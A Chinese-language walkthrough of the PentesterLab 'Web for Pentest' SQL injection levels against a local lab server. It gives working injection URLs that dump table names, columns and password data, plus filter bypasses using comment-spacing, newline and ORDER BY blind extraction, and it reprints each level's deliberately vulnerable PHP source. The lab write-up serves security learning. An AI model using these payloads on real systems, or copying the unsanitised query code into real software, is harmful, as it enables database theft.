web for pentest 之SQL injections
SQL injections
example1
http://192.168.132.131/sqli/example1.php?name=root //初看为字符串型
1.判断列数
http://192.168.132.131/sqli/example1.php?name=root' order by 5 --+ 成功
http://192.168.132.131/sqli/example1.php?name=root' order by 6 --+ 失败
列数为5
2.查询库名和版本号
得到库名为exercises ~~~~~~~ 数据库版本为5.1.66-0+squeeze1~~~~~~主机用户名:pentesterlab@localhost
图像 3.png
3.查询库的表名
http://192.168.132.131/sqli/example1.php?name=root' union select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database() --+
可以看到只有一张表为users
图像 4.png
4.查询字段名(列名)
http://192.168.132.131/sqli/example1.php?name=root' union select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=‘users’ --+
得到5个列名分别为id,name,age,groupid,passwd
图像 5.png5.查询所有数据
http://192.168.132.131/sqli/example1.php?name=root' union select group_concat(id,' ',name,' ',age),group_concat(passwd),3,4,5 from users --+
可以看到所有数据出来了
贴个源码
<?php
require_once('../header.php');
require_once('db.php');
$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require_once '../footer.php';
?>
发现没有任何过滤..........
example2
http://192.168.132.131/sqli/example2.php?name=root%27%20or%201=1%20#
显示ERROR NO SPACE 看来是过滤了啥,执行不了,懒得试了看看源码
<?php
require_once('../header.php');
require_once('db.php');
if (preg_match('/ /', $_GET["name"])) {
die("ERROR NO SPACE");
}
$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
有个preg_match函数过滤,preg_match — 执行一个正则表达式匹配
图像 7.png
也就是过滤了空格,所以直接注释空格就好了
图像 8.png192.168.132.131/sqli/example2.php?name=root'/**/union/**/select/**/group_concat(id,name,age),2,3,4,5/**/from/**/users/**/%23
example3
好生奇怪第三关直接可以用第二关的payload
192.168.132.131/sqli/example2.php?name=root'/**/union/**/select/**/group_concat(id,name,age),2,3,4,5/**/from/**/users/**/%23
直接爆出数据来
看看源码去
<?php
require_once('../header.php');
require_once('db.php');
if (preg_match('/\s+/', $_GET["name"])) {
die("ERROR NO SPACE");
}
$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
图像 11.png
这个显得更加高级一点
example4
这关换成id了,http://192.168.132.131/sqli/example4.php?id=2%20order%20by%205#
一试发现是数字型注入,老办法来,直接给出payload
图像 9.png
看看源码
<?php
require_once('../header.php');
require_once('db.php');
$sql="SELECT * FROM users where id=";
$sql.=mysql_real_escape_string($_GET["id"])." ";
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
有个过滤函数,mysql_real_ecape_string()对特殊符号转义,但这数字型没有特殊符号,就绕过了
图像 10.png
example5
额,上题payload同样可以适用
<?php
require_once('../header.php');
require_once('db.php');
if (!preg_match('/^[0-9]+/', $_GET["id"])) {
die("ERROR INTEGER REQUIRED");
}
$sql = "SELECT * FROM users where id=";
$sql .= $_GET["id"] ;
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
正则表达,匹配非数字型的过滤,高级一点而已,同样绕过
example6
有点迷,不知道怎么过滤的,猜测是有 /[0-9]+/ 之类的过滤。根据上一题,猜测是只匹配了$,于是在#后面加上个数字吧,看下源码
<?php
require_once('../header.php');
require_once('db.php');
if (!preg_match('/[0-9]+$/', $_GET["id"])) {
die("ERROR INTEGER REQUIRED");
}
$sql = "SELECT * FROM users where id=";
$sql .= $_GET["id"] ;
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
/[0-9]+$/匹配末尾为数字就可以了,直接给出payload
example7
试了几个都没用,看看源码
<?php
require_once('../header.php');
require_once('db.php');
if (!preg_match('/^-?[0-9]+$/m', $_GET["id"])) {
die("ERROR INTEGER REQUIRED");
}
$sql = "SELECT * FROM users where id=";
$sql .= $_GET["id"];
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr><th>id</th><th>name</th><th>age</th></tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
发现/m可以匹配多行
图像 1.png
查到%0A可以结尾每行,试试上payload
example8
<?php
require_once('../header.php');
require_once('db.php');
$sql = "SELECT * FROM users ORDER BY `";
$sql .= mysql_real_escape_string($_GET["order"])."`";
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr>
<th><a href="example8.php?order=id">id</th>
<th><a href="example8.php?order=name">name</th>
<th><a href="example8.php?order=age">age</th>
</tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
看了源码直接丢sqlmap里跑吧!
http://192.168.132.131/sqli/example8.php?order=id`, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1%23
example9
?php
require_once('../header.php');
require_once('db.php');
$sql = "SELECT * FROM users ORDER BY ";
$sql .= mysql_real_escape_string($_GET["order"]);
$result = mysql_query($sql);
if ($result) {
?>
<table class='table table-striped'>
<tr>
<th><a href="example9.php?order=id">id</th>
<th><a href="example9.php?order=name">name</th>
<th><a href="example9.php?order=age">age</th>
</tr>
<?php
while ($row = mysql_fetch_assoc($result)) {
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['name']."</td>";
echo "<td>".$row['age']."</td>";
echo "</tr>";
}
echo "</table>";
}
require '../footer.php';
?>
同理直接上payload
http://192.168.132.131//sqli/example9.php?order=(select CASE WHEN (SELECT ASCII(SUBSTRING(passwd, 1, 1)) FROM users where name = 0x726f6f74) = 98 THEN age ELSE id END)%23